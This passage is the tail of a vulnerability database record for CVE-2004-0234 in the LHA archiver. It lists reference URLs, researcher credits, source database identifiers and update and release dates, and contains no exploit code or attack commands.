url:http://secunia.com/advisories/19514/

Trust: 0.1

url:http://lists.grok.org.uk/pipermail/full-disclosure/2006-april/044874.html

Trust: 0.1

url:http://secunia.com/advisories/11510/

Trust: 0.1

url:http://shellcode.org/audit/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2004-0234

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2004-0235

Trust: 0.1

url:http://idiosynkratisk.tk/

Trust: 0.1

url:http://www.advogato.org/person/metaur/

Trust: 0.1

url:http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm

Trust: 0.1

url:http://www2m.biglobe.ne.jp/~dolphin/lha/prog/

Trust: 0.1

url:http://secunia.com/product/8297/

Trust: 0.1

url:http://www.guay-leroux.com/projects/zoo-advisory.txt

Trust: 0.1

url:http://www.barracudanetworks.com/

Trust: 0.1

url:http://www.guay-leroux.com

Trust: 0.1

sources: VULHUB: VHN-8664 // BID: 10243 // JVNDB: JVNDB-2004-000169 // PACKETSTORM: 45159 // PACKETSTORM: 33241 // PACKETSTORM: 44104 // PACKETSTORM: 45164 // CNNVD: CNNVD-200408-202 // NVD: CVE-2004-0234

CREDITS

Ulf Harnhammar※ ulfh@update.uu.se※Jean-Sébastien Guay-Leroux※ jean-sebastien@guay-leroux.com

Trust: 0.6

sources: CNNVD: CNNVD-200408-202

SOURCES

db:VULHUBid:VHN-8664
db:BIDid:10243
db:JVNDBid:JVNDB-2004-000169
db:PACKETSTORMid:45159
db:PACKETSTORMid:33241
db:PACKETSTORMid:44104
db:PACKETSTORMid:45164
db:CNNVDid:CNNVD-200408-202
db:NVDid:CVE-2004-0234

LAST UPDATE DATE

2024-08-14T12:26:28.416000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-8664date:2017-10-11T00:00:00
db:BIDid:10243date:2009-07-12T04:07:00
db:JVNDBid:JVNDB-2004-000169date:2008-05-21T00:00:00
db:CNNVDid:CNNVD-200408-202date:2007-05-22T00:00:00
db:NVDid:CVE-2004-0234date:2017-10-11T01:29:24.730

SOURCES RELEASE DATE

db:VULHUBid:VHN-8664date:2004-08-18T00:00:00
db:BIDid:10243date:2004-04-30T00:00:00
db:JVNDBid:JVNDB-2004-000169date:2008-05-21T00:00:00
db:PACKETSTORMid:45159date:2006-04-04T19:25:51
db:PACKETSTORMid:33241date:2004-05-04T04:25:06
db:PACKETSTORMid:44104date:2006-02-25T00:55:07
db:PACKETSTORMid:45164date:2006-04-04T19:39:53
db:CNNVDid:CNNVD-200408-202date:2004-04-30T00:00:00
db:NVDid:CVE-2004-0234date:2004-08-18T04:00:00